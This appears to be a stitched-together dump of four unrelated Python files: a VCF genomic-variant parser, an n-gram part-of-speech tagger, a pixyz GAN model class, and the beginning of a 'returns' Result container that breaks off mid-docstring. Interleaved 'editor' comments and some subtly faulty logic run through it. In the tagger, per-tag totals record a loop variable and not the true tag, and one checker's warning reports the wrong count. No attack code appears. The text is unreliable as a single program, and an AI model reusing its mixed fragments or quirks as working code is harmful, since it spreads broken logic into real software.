def parse_key_value(self, key, value):
return self.line_class(key, value, parse_mapping(value))
def build_header_parsers():
"""Return mapping for parsers to use for each VCF header type
Inject the WarningHelper into the parsers.
"""
result = {
"ALT": MappingHeaderLineParser(header.AltAlleleHeaderLine),
"contig": MappingHeaderLineParser(header.ContigHeaderLine),
"FILTER": MappingHeaderLineParser(header.FilterHeaderLine),
"FORMAT": MappingHeaderLineParser(header.FormatHeaderLine),
"INFO": MappingHeaderLineParser(header.InfoHeaderLine),
"META": MappingHeaderLineParser(header.MetaHeaderLine),
"PEDIGREE": MappingHeaderLineParser(header.PedigreeHeaderLine),
"SAMPLE": MappingHeaderLineParser(header.SampleHeaderLine),
"__default__": StupidHeaderLineParser(), # fallback
}
return result
# Field value converters
_CONVERTERS = {
"Integer": int,
"Float": float,
"Flag": lambda x: True,
"Character": str,
"String": str,
}
def convert_field_value(type_, value):
"""Convert atomic field value according to the type"""
if value == ".":
return None
elif type_ in ("Character", "String"):
if "%" in value:
for k, v in record.UNESCAPE_MAPPING:
value = value.replace(k, v)
return value
else:
try:
return _CONVERTERS[type_](value)
except ValueError:
warnings.warn(
("{} cannot be converted to {}, keeping as " "string.").format(value, type_),
CannotConvertValue,
)
return value
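# For illustration (assumed inputs): convert_field_value("Integer", "10") -> 10,
# convert_field_value("Float", ".") -> None, and a non-numeric value such as
# convert_field_value("Integer", "n/a") falls back to the original string and
# issues a CannotConvertValue warning.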
def parse_field_value(field_info, value):
"""Parse ``value`` according to ``field_info``
"""
if field_info.id == "FT":
return [x for x in value.split(";") if x != "."]
elif field_info.type == "Flag":
return True
elif field_info.number == 1:
return convert_field_value(field_info.type, value)
else:
if value == ".":
return []
else:
return [convert_field_value(field_info.type, x) for x in value.split(",")]
# Regular expression for break-end
BREAKEND_PATTERN = re.compile("[\\[\\]]")
def parse_breakend(alt_str):
"""Parse breakend and return tuple with results, parameters for BreakEnd
constructor
"""
arr = BREAKEND_PATTERN.split(alt_str)
mate_chrom, mate_pos = arr[1].split(":", 1)
mate_pos = int(mate_pos)
if mate_chrom[0] == "<":
mate_chrom = mate_chrom[1:-1]
within_main_assembly = False
else:
within_main_assembly = True
FWD_REV = {True: record.FORWARD, False: record.REVERSE}
orientation = FWD_REV[alt_str[0] == "[" or alt_str[0] == "]"]
mate_orientation = FWD_REV["[" in alt_str]
if orientation == record.FORWARD:
sequence = arr[2]
else:
sequence = arr[0]
return (mate_chrom, mate_pos, orientation, mate_orientation, sequence, within_main_assembly)
def process_sub_grow(ref, alt_str):
"""Process substution where the string grows"""
if len(alt_str) == 0:
raise exceptions.InvalidRecordException("Invalid VCF, empty ALT")
elif len(alt_str) == 1:
if ref[0] == alt_str[0]:
return record.Substitution(record.DEL, alt_str)
else:
return record.Substitution(record.INDEL, alt_str)
else:
return record.Substitution(record.INDEL, alt_str)
def process_sub_shrink(ref, alt_str):
"""Process substution where the string shrink"""
if len(ref) == 0:
raise exceptions.InvalidRecordException("Invalid VCF, empty REF")
elif len(ref) == 1:
if ref[0] == alt_str[0]:
return record.Substitution(record.INS, alt_str)
else:
return record.Substitution(record.INDEL, alt_str)
else:
return record.Substitution(record.INDEL, alt_str)
def process_sub(ref, alt_str):
"""Process substitution"""
if len(ref) == len(alt_str):
if len(ref) == 1:
return record.Substitution(record.SNV, alt_str)
else:
return record.Substitution(record.MNV, alt_str)
elif len(ref) > len(alt_str):
return process_sub_grow(ref, alt_str)
else: # len(ref) < len(alt_str):
return process_sub_shrink(ref, alt_str)
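# For illustration (assumed inputs): process_sub("A", "T") yields a
# Substitution of type SNV, while process_sub("AT", "GC") yields type MNV;
# unequal REF/ALT lengths are delegated to process_sub_grow/process_sub_shrink.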
def process_alt(header, ref, alt_str): # pylint: disable=W0613
"""Process alternative value using Header in ``header``"""
# By its nature, this function contains a large number of case distinctions
if "]" in alt_str or "[" in alt_str:
return record.BreakEnd(*parse_breakend(alt_str))
elif alt_str[0] == "." and len(alt_str) > 0:
return record.SingleBreakEnd(record.FORWARD, alt_str[1:])
elif alt_str[-1] == "." and len(alt_str) > 0:
return record.SingleBreakEnd(record.REVERSE, alt_str[:-1])
elif alt_str[0] == "<" and alt_str[-1] == ">":
inner = alt_str[1:-1]
return record.SymbolicAllele(inner)
else: # substitution
return process_sub(ref, alt_str)
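# Editor note (hedged): a few illustrative ALT strings and how ``process_alt``
# classifies them, assuming REF="A":
#   "G"             -> record.Substitution(SNV)   (same length as REF)
#   "AT"            -> record.Substitution(INS)   (REF is a prefix of ALT)
#   "<DEL>"         -> record.SymbolicAllele("DEL")
#   "G]17:198982]"  -> record.BreakEnd(...)       (bracket break-end notation)
#   ".G" / "G."     -> record.SingleBreakEnd(FORWARD / REVERSE)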
class HeaderParser:
"""Helper class for parsing a VCF header
"""
def __init__(self):
#: Sub parsers to use for parsing the header lines
self.sub_parsers = build_header_parsers()
def parse_line(self, line):
"""Parse VCF header ``line`` (trailing '\r\n' or '\n' is ignored)
:param str line: ``str`` with line to parse
:param dict sub_parsers: ``dict`` mapping header line types to
appropriate parser objects
:returns: appropriate :py:class:`HeaderLine` parsed from ``line``
:raises: :py:class:`vcfpy.exceptions.InvalidHeaderException` if
there was a problem parsing the file
"""
if not line or not line.startswith("##"):
raise exceptions.InvalidHeaderException(
'Invalid VCF header line (must start with "##") {}'.format(line)
)
if "=" not in line:
raise exceptions.InvalidHeaderException(
'Invalid VCF header line (must contain "=") {}'.format(line)
)
line = line[len("##") :].rstrip() # trim '^##' and trailing whitespace
# split key/value pair at "="
key, value = split_mapping(line)
sub_parser = self.sub_parsers.get(key, self.sub_parsers["__default__"])
return sub_parser.parse_key_value(key, value)
class RecordParser:
"""Helper class for parsing VCF records"""
def __init__(self, header, samples, record_checks=None):
#: Header with the meta information
self.header = header
#: SamplesInfos with sample information
self.samples = samples
#: The checks to perform, can contain 'INFO' and 'FORMAT'
self.record_checks = tuple(record_checks or [])
# Expected number of fields
if self.samples.names:
self.expected_fields = 9 + len(self.samples.names)
else:
self.expected_fields = 8
# Cache of FieldInfo objects by FORMAT string
self._format_cache = {}
# Cache of FILTER entries, also applied to FORMAT/FT
self._filter_ids = set(self.header.filter_ids())
# Helper for checking INFO fields
if "INFO" in self.record_checks:
self._info_checker = InfoChecker(self.header)
else:
self._info_checker = NoopInfoChecker()
# Helper for checking FORMAT fields
if "FORMAT" in self.record_checks:
self._format_checker = FormatChecker(self.header)
else:
self._format_checker = NoopFormatChecker()
def parse_line(self, line_str):
"""Parse line from file (including trailing line break) and return
resulting Record
"""
line_str = line_str.rstrip()
if not line_str:
return None # empty line, EOF
arr = self._split_line(line_str)
# CHROM
chrom = arr[0]
# POS
pos = int(arr[1])
# IDS
if arr[2] == ".":
ids = []
else:
ids = arr[2].split(";")
# REF
ref = arr[3]
# ALT
alts = []
if arr[4] != ".":
for alt in arr[4].split(","):
alts.append(process_alt(self.header, ref, alt))
# QUAL
if arr[5] == ".":
qual = None
else:
try:
qual = int(arr[5])
except ValueError: # try as float
qual = float(arr[5])
# FILTER
if arr[6] == ".":
filt = []
else:
filt = arr[6].split(";")
self._check_filters(filt, "FILTER")
# INFO
info = self._parse_info(arr[7], len(alts))
if len(arr) == 9:
raise exceptions.IncorrectVCFFormat("Expected 8 or 10+ columns, got 9!")
elif len(arr) == 8:
format_ = None
calls = None
else:
# FORMAT
format_ = arr[8].split(":")
# sample/call columns
calls = self._handle_calls(alts, format_, arr[8], arr)
return record.Record(chrom, pos, ids, ref, alts, qual, filt, info, format_, calls)
def _handle_calls(self, alts, format_, format_str, arr):
"""Handle FORMAT and calls columns, factored out of parse_line"""
if format_str not in self._format_cache:
self._format_cache[format_str] = list(map(self.header.get_format_field_info, format_))
# per-sample calls
calls = []
for sample, raw_data in zip(self.samples.names, arr[9:]):
if self.samples.is_parsed(sample):
data = self._parse_calls_data(format_, self._format_cache[format_str], raw_data)
call = record.Call(sample, data)
self._format_checker.run(call, len(alts))
self._check_filters(call.data.get("FT"), "FORMAT/FT", call.sample)
calls.append(call)
else:
calls.append(record.UnparsedCall(sample, raw_data))
return calls
def _check_filters(self, filt, source, sample=None):
if not filt:
return
for f in filt:
self._check_filter(f, source, sample)
def _check_filter(self, f, source, sample):
if f == "PASS":
            pass  # the PASS filter is implicitly defined
elif f not in self._filter_ids:
if source == "FILTER":
warnings.warn(
("Filter not found in header: {}; problem in FILTER " "column").format(f),
UnknownFilter,
)
else:
assert source == "FORMAT/FT" and sample
warnings.warn(
(
"Filter not found in header: {}; problem in "
"FORMAT/FT column of sample {}"
).format(f, sample),
UnknownFilter,
)
def _split_line(self, line_str):
"""Split line and check number of columns"""
arr = line_str.rstrip().split("\t")
if len(arr) != self.expected_fields:
raise exceptions.InvalidRecordException(
(
"The line contains an invalid number of fields. Was "
"{} but expected {}\n{}".format(len(arr), 9 + len(self.samples.names), line_str)
)
)
return arr
def _parse_info(self, info_str, num_alts):
"""Parse INFO column from string"""
result = OrderedDict()
if info_str == ".":
return result
# The standard is very nice to parsers, we can simply split at
        # semicolon characters, although I (Manuel) don't know how strictly
# programs follow this
for entry in info_str.split(";"):
if "=" not in entry: # flag
key = entry
result[key] = parse_field_value(self.header.get_info_field_info(key), True)
else:
key, value = split_mapping(entry)
result[key] = parse_field_value(self.header.get_info_field_info(key), value)
self._info_checker.run(key, result[key], num_alts)
return result
@classmethod
def _parse_calls_data(klass, format_, infos, gt_str):
"""Parse genotype call information from arrays using format array
:param list format: List of strings with format names
:param gt_str arr: string with genotype information values
"""
data = OrderedDict()
# The standard is very nice to parsers, we can simply split at
        # colon characters, although I (Manuel) don't know how strictly
# programs follow this
for key, info, value in zip(format_, infos, gt_str.split(":")):
data[key] = parse_field_value(info, value)
return data
class HeaderChecker:
"""Helper class for checking a VCF header
"""
def run(self, header):
"""Check the header
Warnings will be printed using ``warnings`` while errors will raise
an exception.
:raises: ``vcfpy.exceptions.InvalidHeaderException`` in the case of
severe errors reading the header
"""
self._check_header_lines(header.lines)
def _check_header_lines(self, header_lines):
"""Check header lines, in particular for starting file "##fileformat"
"""
if not header_lines:
raise exceptions.InvalidHeaderException(
"The VCF file did not contain any header lines!"
)
first = header_lines[0]
if first.key != "fileformat":
raise exceptions.InvalidHeaderException("The VCF file did not start with ##fileformat")
if first.value not in SUPPORTED_VCF_VERSIONS:
warnings.warn("Unknown VCF version {}".format(first.value), UnknownVCFVersion)
@functools.lru_cache(maxsize=32)
def binomial(n, k):
try:
res = math.factorial(n) // math.factorial(k) // math.factorial(n - k)
except ValueError:
res = 0
return res
class NoopInfoChecker:
"""Helper class that performs no checks"""
def __init__(self):
pass
def run(self, key, value, num_alts):
pass
class InfoChecker:
"""Helper class for checking an INFO field"""
def __init__(self, header):
#: VCFHeader to use for checking
self.header = header
def run(self, key, value, num_alts):
"""Check value in INFO[key] of record
Currently, only checks for consistent counts are implemented
:param str key: key of INFO entry to check
:param value: value to check
        :param int num_alts: number of alternative alleles in the record
"""
field_info = self.header.get_info_field_info(key)
if not isinstance(value, list):
return
TABLE = {
".": len(value),
"A": num_alts,
"R": num_alts + 1,
"G": binomial(num_alts + 1, 2), # diploid only at the moment
}
expected = TABLE.get(field_info.number, field_info.number)
if len(value) != expected:
tpl = "Number of elements for INFO field {} is {} instead of {}"
warnings.warn(
tpl.format(key, len(value), field_info.number), exceptions.IncorrectListLength
)
class NoopFormatChecker:
"""Helper class that performs no checks"""
def __init__(self):
pass
def run(self, call, num_alts):
pass
class FormatChecker:
"""Helper class for checking a FORMAT field"""
def __init__(self, header):
#: VCFHeader to use for checking
self.header = header
def run(self, call, num_alts):
"""Check ``FORMAT`` of a record.Call
Currently, only checks for consistent counts are implemented
"""
for key, value in call.data.items():
self._check_count(call, key, value, num_alts)
def _check_count(self, call, key, value, num_alts):
field_info = self.header.get_format_field_info(key)
        if not isinstance(value, list):
return
num_alleles = len(call.gt_alleles or [])
TABLE = {
".": len(value),
"A": num_alts,
"R": num_alts + 1,
"G": binomial(num_alts + num_alleles, num_alleles),
}
expected = TABLE.get(field_info.number, field_info.number)
if len(value) != expected:
tpl = (
"Number of elements for FORMAT field {} is {} instead "
"of {} (number specifier {})"
)
warnings.warn(
tpl.format(key, len(value), expected, field_info.number),
exceptions.IncorrectListLength,
)
class Parser:
"""Class for line-wise parsing of VCF files
In most cases, you want to use :py:class:`vcfpy.reader.Reader` instead.
:param stream: ``file``-like object to read from
:param str path: path the VCF is parsed from, for display purposes
only, optional
"""
def __init__(self, stream, path=None, record_checks=None):
self.stream = stream
self.path = path
#: checks to perform, can contain 'INFO' and 'FORMAT'
self.record_checks = tuple(record_checks or [])
#: header, once it has been read
self.header = None
# the currently read line
self._line = stream.readline() # trailing '\n'
#: :py:class:`vcfpy.header.SamplesInfos` with sample information;
#: set on parsing the header
self.samples = None
# helper for parsing the records
self._record_parser = None
# helper for checking the header
self._header_checker = HeaderChecker()
def _read_next_line(self):
"""Read next line store in self._line and return old one"""
prev_line = self._line
self._line = self.stream.readline()
return prev_line
def parse_header(self, parsed_samples=None):
"""Read and parse :py:class:`vcfpy.header.Header` from file, set
into ``self.header`` and return it
:param list parsed_samples: ``list`` of ``str`` for subsetting the
samples to parse
:returns: ``vcfpy.header.Header``
:raises: ``vcfpy.exceptions.InvalidHeaderException`` in the case of
problems reading the header
"""
# parse header lines
sub_parser = HeaderParser()
header_lines = []
while self._line and self._line.startswith("##"):
header_lines.append(sub_parser.parse_line(self._line))
self._read_next_line()
# parse sample info line
self.samples = self._handle_sample_line(parsed_samples)
# construct Header object
self.header = header.Header(header_lines, self.samples)
# check header for consistency
self._header_checker.run(self.header)
# construct record parser
self._record_parser = RecordParser(self.header, self.samples, self.record_checks)
# read next line, must not be header
self._read_next_line()
if self._line and self._line.startswith("#"):
raise exceptions.IncorrectVCFFormat(
'Expecting non-header line or EOF after "#CHROM" line'
)
return self.header
def _handle_sample_line(self, parsed_samples=None):
""""Check and interpret the "##CHROM" line and return samples"""
if not self._line or not self._line.startswith("#CHROM"):
raise exceptions.IncorrectVCFFormat('Missing line starting with "#CHROM"')
# check for space before INFO
line = self._line.rstrip()
pos = line.find("FORMAT") if ("FORMAT" in line) else line.find("INFO")
if pos == -1:
raise exceptions.IncorrectVCFFormat('Ill-formatted line starting with "#CHROM"')
if " " in line[:pos]:
warnings.warn(
(
"Found space in #CHROM line, splitting at whitespace "
"instead of tab; this VCF file is ill-formatted"
),
SpaceInChromLine,
)
arr = self._line.rstrip().split()
else:
arr = self._line.rstrip().split("\t")
self._check_samples_line(arr)
return header.SamplesInfos(arr[len(REQUIRE_SAMPLE_HEADER) :], parsed_samples)
@classmethod
def _check_samples_line(klass, arr):
"""Peform additional check on samples line"""
if len(arr) <= len(REQUIRE_NO_SAMPLE_HEADER):
if tuple(arr) != REQUIRE_NO_SAMPLE_HEADER:
raise exceptions.IncorrectVCFFormat(
"Sample header line indicates no sample but does not "
"equal required prefix {}".format("\t".join(REQUIRE_NO_SAMPLE_HEADER))
)
elif tuple(arr[: len(REQUIRE_SAMPLE_HEADER)]) != REQUIRE_SAMPLE_HEADER:
raise exceptions.IncorrectVCFFormat(
'Sample header line (starting with "#CHROM") does not '
"start with required prefix {}".format("\t".join(REQUIRE_SAMPLE_HEADER))
)
def parse_line(self, line):
"""Pare the given line without reading another one from the stream"""
return self._record_parser.parse_line(line)
def parse_next_record(self):
"""Read, parse and return next :py:class:`vcfpy.record.Record`
:returns: next VCF record or ``None`` if at end
:raises: ``vcfpy.exceptions.InvalidRecordException`` in the case of
problems reading the record
"""
return self.parse_line(self._read_next_line())
def print_warn_summary(self):
"""If there were any warnings, print summary with warnings"""
# TODO: remove?
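# ---------------------------------------------------------------------------
# Editor-added usage sketch (hedged): a minimal end-to-end run of the Parser
# defined above on an in-memory VCF.  The header lines, sample name and the
# expected output are illustrative only and assume the rest of this module
# (``header``, ``record``, ``exceptions``, ...) behaves as documented.
if __name__ == "__main__":  # pragma: no cover
    import io
    _demo_vcf = (
        "##fileformat=VCFv4.2\n"
        '##INFO=<ID=DP,Number=1,Type=Integer,Description="Total depth">\n'
        '##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">\n'
        "#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tSAMPLE1\n"
        "1\t100\t.\tA\tG\t29\tPASS\tDP=14\tGT\t0/1\n"
    )
    _parser = Parser(io.StringIO(_demo_vcf), path="<in-memory>")
    _parser.parse_header()
    _rec = _parser.parse_next_record()
    # should print something like: 1 100 [Substitution(...)] 14
    print(_rec.CHROM, _rec.POS, _rec.ALT, _rec.INFO.get("DP"))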
|
#!/usr/bin/python
# -*- coding: utf-8 -*
import re
import pandas as pd
import os
from data_preparation import *
from collections import Counter
import numpy as np
import pickle
from metrics import accuracy, build_confusion_matrices
def n_gram_train(filepath, grammage, folder, register_change, start_end_symbols, weighed, tf_idf_coefficient, length, double):
tf_idf_coefficient = float(tf_idf_coefficient)
dataset = pd.DataFrame(columns=['WORD', 'TAG'])
raw_data = open(filepath, encoding='utf8').readlines()
counter = 0
for instance in raw_data:
if (instance[0] != "#" and instance.strip()):
cols = instance.split('\t')
if (int(register_change) == 0):
dataset.loc[counter] = [cols[1], cols[3]]
else:
dataset.loc[counter] = [cols[1].lower(), cols[3]]
counter = counter + 1
names = dataset['TAG'].unique().tolist()
final_dictionary = {}
start_end_symbols = int(start_end_symbols)
if (length == 1):
by_length_dictionary = {}
if (weighed == 1):
corpus_length = dataset.shape[0]
ngram_in_word_dictionary = {}
words_with_ngram_dictionary = {}
for name in names:
clone = dataset[dataset['TAG'] == name]
n_grams = []
if (length == 1):
words_lengths = []
for word in clone['WORD']:
if (start_end_symbols == 1):
word = "#" + word + "#"
if (length == 1):
words_lengths.append(len(word))
if (weighed == 1):
ngrams_of_word_dictionary = {}
for gram in test_split(word, "", 0, int(grammage), double):
n_grams.extend(gram)
if (weighed == 1):
if gram[0] in words_with_ngram_dictionary.keys():
words_with_ngram_dictionary[gram[0]].append(word)
else:
words_with_ngram_dictionary[gram[0]] = []
words_with_ngram_dictionary[gram[0]].append(word)
if gram[0] in ngrams_of_word_dictionary.keys():
ngrams_of_word_dictionary[gram[0]] += 1
else:
ngrams_of_word_dictionary[gram[0]] = 1
if (weighed == 1):
for gram in ngrams_of_word_dictionary.keys():
if gram in ngram_in_word_dictionary.keys():
if (ngrams_of_word_dictionary[gram] > ngram_in_word_dictionary[gram]):
ngram_in_word_dictionary[gram] = ngrams_of_word_dictionary[gram]
else:
ngram_in_word_dictionary[gram] = ngrams_of_word_dictionary[gram]
if (length == 1):
by_length_dictionary[name] = round(np.mean(words_lengths))
cnt = Counter(n_grams)
grams = []
if (weighed == 0):
for gram in cnt.most_common(2):
grams.append(gram[0])
else:
weighed_grams = {}
for gram in cnt.most_common():
weighed_grams[gram[0]] = tf_idf_n_gram(tf_idf_coefficient, gram[1], ngram_in_word_dictionary[gram[0]], corpus_length, len(words_with_ngram_dictionary[gram[0]]))
weighed_grams = dict(reversed(sorted(weighed_grams.items(), key=lambda item: item[1])))
for key in list(weighed_grams.keys())[0:2]:
grams.append(key)
final_dictionary[name] = grams
with open(folder + "\\" + grammage + 'grams.pkl', 'wb+') as f:
pickle.dump(final_dictionary, f, pickle.HIGHEST_PROTOCOL)
if (length == 1):
with open(folder + "\\length_" + grammage + 'grams.pkl', 'wb+') as f:
pickle.dump(by_length_dictionary, f, pickle.HIGHEST_PROTOCOL)
def n_gram_test(data, folder, grammage, register_change, start_end_symbols, length):
test_dataset = pd.DataFrame(columns=['WORD', 'TAG'])
raw_data = open(data, encoding='utf8').readlines()
counter = 0
start_end_symbols = int(start_end_symbols)
for instance in raw_data:
if (instance[0] != "#" and instance.strip()):
cols = instance.split('\t')
            if (int(register_change) == 0):
                word = cols[1]
            else:
                word = cols[1].lower()
            # pad with '#' exactly as in training, independent of the casing flag
            if (start_end_symbols == 1):
                word = "#" + word + "#"
            test_dataset.loc[counter] = [word, cols[3]]
counter = counter + 1
with open(folder + "\\" + grammage + "grams.pkl", 'rb') as f:
final_dictionary = pickle.load(f)
if (length == 1):
with open(folder + "\\length_" + grammage + 'grams.pkl', 'rb') as f:
by_length_dictionary = pickle.load(f)
correct = 0
total = 0
correct_by_part = []
total_by_part = []
true_pred_dataset = pd.DataFrame(columns=['tok', 'true', 'pred'])
for index, row in test_dataset.iterrows():
key_found = False
for key in final_dictionary.keys():
if re.search(final_dictionary[key][0], row['WORD']):
if key == row['TAG']:
correct = correct + 1
correct_by_part.append(key)
key_found = True
true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], key]
break
elif re.search(final_dictionary[key][1], row['WORD']):
if key == row['TAG']:
correct = correct + 1
correct_by_part.append(key)
key_found = True
true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], key]
break
            elif length == 1:
                # record the tag predicted by the length heuristic, not the loop variable
                if len(row['WORD']) == by_length_dictionary['CCONJ']:
                    if row['TAG'] == 'CCONJ':
                        correct = correct + 1
                        correct_by_part.append('CCONJ')
                    key_found = True
                    true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], 'CCONJ']
                    break
                elif len(row['WORD']) == by_length_dictionary['ADP']:
                    if row['TAG'] == 'ADP':
                        correct = correct + 1
                        correct_by_part.append('ADP')
                    key_found = True
                    true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], 'ADP']
                    break
                elif len(row['WORD']) == by_length_dictionary['VERB']:
                    if row['TAG'] == 'VERB':
                        correct = correct + 1
                        correct_by_part.append('VERB')
                    key_found = True
                    true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], 'VERB']
                    break
        if not key_found:
            if row['TAG'] == 'VERB':
                correct = correct + 1
                correct_by_part.append('VERB')
            # always log the fallback prediction so res.csv covers every token
            true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], 'VERB']
total = total + 1
total_by_part.append(key)
true_pred_dataset.to_csv(folder + "\\" + 'res.csv', index=False)
accuracy(correct_by_part, total_by_part, correct, total)
build_confusion_matrices(true_pred_dataset)
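# Editor-added usage sketch (hedged): the functions above expect CoNLL-U style
# input (token FORM in column 1, UPOS tag in column 3, '#'-prefixed comment
# lines).  The file names, the n-gram size and the ``double`` flag below are
# illustrative assumptions only; note that the pickled models are written with
# Windows-style path separators, as in the code above.
#
#     n_gram_train("ud-train.conllu", grammage="3", folder="models",
#                  register_change=1, start_end_symbols=1, weighed=0,
#                  tf_idf_coefficient=0.0, length=0, double=0)
#     n_gram_test("ud-test.conllu", "models", "3",
#                 register_change=1, start_end_symbols=1, length=0)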
|
<reponame>masa-su/pixyz<filename>pixyz/models/gan.py<gh_stars>100-1000
from torch import optim
from ..models.model import Model
from ..losses import AdversarialJensenShannon
from ..distributions import EmpiricalDistribution
class GAN(Model):
r"""
Generative Adversarial Network
(Adversarial) Jensen-Shannon divergence between given distributions (p_data, p)
is set as the loss class of this model.
Examples
--------
>>> import torch
>>> from torch import nn, optim
>>> from pixyz.distributions import Deterministic
>>> from pixyz.distributions import Normal
>>> from pixyz.models import GAN
>>> from pixyz.utils import print_latex
>>> x_dim = 128
>>> z_dim = 100
...
>>> # Set distributions (Distribution API)
...
>>> # generator model p(x|z)
>>> class Generator(Deterministic):
... def __init__(self):
... super(Generator, self).__init__(var=["x"], cond_var=["z"], name="p")
... self.model = nn.Sequential(
... nn.Linear(z_dim, x_dim),
... nn.Sigmoid()
... )
... def forward(self, z):
... x = self.model(z)
... return {"x": x}
...
>>> # prior model p(z)
>>> prior = Normal(loc=torch.tensor(0.), scale=torch.tensor(1.),
... var=["z"], features_shape=[z_dim], name="p_{prior}")
...
>>> # generative model
>>> p_g = Generator()
>>> p = (p_g*prior).marginalize_var("z")
...
>>> # discriminator model p(t|x)
>>> class Discriminator(Deterministic):
... def __init__(self):
... super(Discriminator, self).__init__(var=["t"], cond_var=["x"], name="d")
... self.model = nn.Sequential(
... nn.Linear(x_dim, 1),
... nn.Sigmoid()
... )
... def forward(self, x):
... t = self.model(x)
... return {"t": t}
...
>>> d = Discriminator()
>>> # Set a model (Model API)
>>> model = GAN(p, d, optimizer_params={"lr":0.0002}, d_optimizer_params={"lr":0.0002})
>>> print(model)
Distributions (for training):
p(x)
Loss function:
mean(D_{JS}^{Adv} \left[p_{data}(x)||p(x) \right])
Optimizer:
Adam (
Parameter Group 0
amsgrad: False
betas: (0.9, 0.999)
eps: 1e-08
lr: 0.0002
weight_decay: 0
)
>>> # Train and test the model
>>> data = torch.randn(1, x_dim) # Pseudo data
>>> train_loss = model.train({"x": data})
>>> test_loss = model.test({"x": data})
"""
def __init__(self, p, discriminator,
optimizer=optim.Adam,
optimizer_params={},
d_optimizer=optim.Adam,
d_optimizer_params={},
clip_grad_norm=None,
clip_grad_value=None):
"""
Parameters
----------
p : torch.distributions.Distribution
Generative model (generator).
discriminator : torch.distributions.Distribution
Critic (discriminator).
optimizer : torch.optim
Optimization algorithm.
        optimizer_params : dict
            Parameters of optimizer.
        d_optimizer : torch.optim
            Optimization algorithm of the discriminator.
        d_optimizer_params : dict
            Parameters of the discriminator's optimizer.
clip_grad_norm : float or int
Maximum allowed norm of the gradients.
clip_grad_value : float or int
Maximum allowed value of the gradients.
"""
# set distributions (for training)
distributions = [p]
p_data = EmpiricalDistribution(p.var)
# set losses
loss = AdversarialJensenShannon(p_data, p, discriminator, optimizer=d_optimizer,
optimizer_params=d_optimizer_params)
super().__init__(loss, test_loss=loss,
distributions=distributions,
optimizer=optimizer, optimizer_params=optimizer_params,
clip_grad_norm=clip_grad_norm, clip_grad_value=clip_grad_value)
def train(self, train_x_dict={}, adversarial_loss=True, **kwargs):
"""Train the model.
Parameters
----------
train_x_dict : dict, defaults to {}
Input data.
adversarial_loss : bool, defaults to True
Whether to train the discriminator.
**kwargs
Returns
-------
loss : torch.Tensor
Train loss value.
d_loss : torch.Tensor
Train loss value of the discriminator (if :attr:`adversarial_loss` is True).
"""
if adversarial_loss:
d_loss = self.loss_cls.loss_train(train_x_dict, **kwargs)
loss = super().train(train_x_dict, **kwargs)
if adversarial_loss:
return loss, d_loss
return loss
def test(self, test_x_dict={}, adversarial_loss=True, **kwargs):
"""Train the model.
Parameters
----------
test_x_dict : dict, defaults to {}
Input data.
adversarial_loss : bool, defaults to True
Whether to return the discriminator loss.
**kwargs
Returns
-------
loss : torch.Tensor
Test loss value.
d_loss : torch.Tensor
Test loss value of the discriminator (if :attr:`adversarial_loss` is True).
"""
loss = super().test(test_x_dict, **kwargs)
if adversarial_loss:
d_loss = self.loss_cls.loss_test(test_x_dict, **kwargs)
return loss, d_loss
return loss
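# Editor-added usage sketch (hedged): a minimal epoch loop over the ``model``
# built in the docstring example above; the dataset, batch size and epoch
# count are illustrative only.
#
#     from torch.utils.data import DataLoader, TensorDataset
#     loader = DataLoader(TensorDataset(torch.randn(256, x_dim)), batch_size=32)
#     for epoch in range(5):
#         for (x,) in loader:
#             g_loss, d_loss = model.train({"x": x})  # discriminator step, then generator step
#     test_g_loss, test_d_loss = model.test({"x": torch.randn(32, x_dim)})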
|
# -*- coding: utf-8 -*-
from abc import ABCMeta
from functools import wraps
from inspect import iscoroutinefunction
from typing import (
Any,
Callable,
ClassVar,
Coroutine,
Generic,
NoReturn,
Type,
TypeVar,
Union,
overload,
)
from typing_extensions import final
from returns.primitives.container import BaseContainer
from returns.primitives.exceptions import UnwrapFailedError
# Definitions:
_ValueType = TypeVar('_ValueType', covariant=True)
_NewValueType = TypeVar('_NewValueType')
_ErrorType = TypeVar('_ErrorType', covariant=True)
_NewErrorType = TypeVar('_NewErrorType')
# Aliases:
_DefaultValueType = TypeVar('_DefaultValueType')
_FirstType = TypeVar('_FirstType')
_SecondType = TypeVar('_SecondType')
class Result(
BaseContainer,
Generic[_ValueType, _ErrorType],
metaclass=ABCMeta,
):
"""
Base class for :class:`~_Failure` and :class:`~_Success`.
    :class:`~Result` does not have a public constructor; use the :func:`Success` and :func:`Failure` helpers defined below.
"""
_inner_value: Union[_ValueType, _ErrorType]
success_type: ClassVar[Type['_Success']]
failure_type: ClassVar[Type['_Failure']]
def map( # noqa: A003
self,
function: Callable[[_ValueType], _NewValueType],
) -> 'Result[_NewValueType, _ErrorType]':
"""Abstract method to compose container with a pure function."""
raise NotImplementedError
def bind(
self,
function: Callable[[_ValueType], 'Result[_NewValueType, _ErrorType]'],
) -> 'Result[_NewValueType, _ErrorType]':
"""Abstract method to compose a container with another container."""
raise NotImplementedError
def fix(
self,
function: Callable[[_ErrorType], _NewValueType],
) -> 'Result[_NewValueType, _ErrorType]':
"""
Abstract method to compose failed container and a pure function.
This pure function should return a new state
for a successful container.
"""
raise NotImplementedError
def alt(
self,
function: Callable[[_ErrorType], _NewErrorType],
) -> 'Result[_ValueType, _NewErrorType]':
"""
Abstract method to compose failed container and a pure function.
This pure function should return a new state
for a new failed container.
"""
raise NotImplementedError
def rescue(
self,
function: Callable[
[_ErrorType], 'Result[_ValueType, _NewErrorType]',
],
) -> 'Result[_ValueType, _NewErrorType]':
"""
Abstract method to compose a failed container with another container.
        This method is the opposite of ``.bind()``.
"""
raise NotImplementedError
def value_or(
self,
default_value: _DefaultValueType,
) -> Union[_ValueType, _DefaultValueType]:
"""Get value or default value."""
raise NotImplementedError
def unwrap(self) -> _ValueType:
"""Get value or raise exception."""
raise NotImplementedError
def failure(self) -> _ErrorType:
"""Get failed value or raise exception."""
raise NotImplementedError
@final
class _Failure(Result[Any, _ErrorType]):
"""
Represents a calculation which has failed.
It should contain an error code or message.
Should not be used directly.
"""
_inner_value: _ErrorType
def __init__(self, inner_value: _ErrorType) -> None:
"""Required for typing."""
super().__init__(inner_value)
def map(self, function): # noqa: A003
"""
Returns the '_Failure' instance that was used to call the method.
.. code:: python
>>> def mappable(string: str) -> str:
... return string + 'b'
...
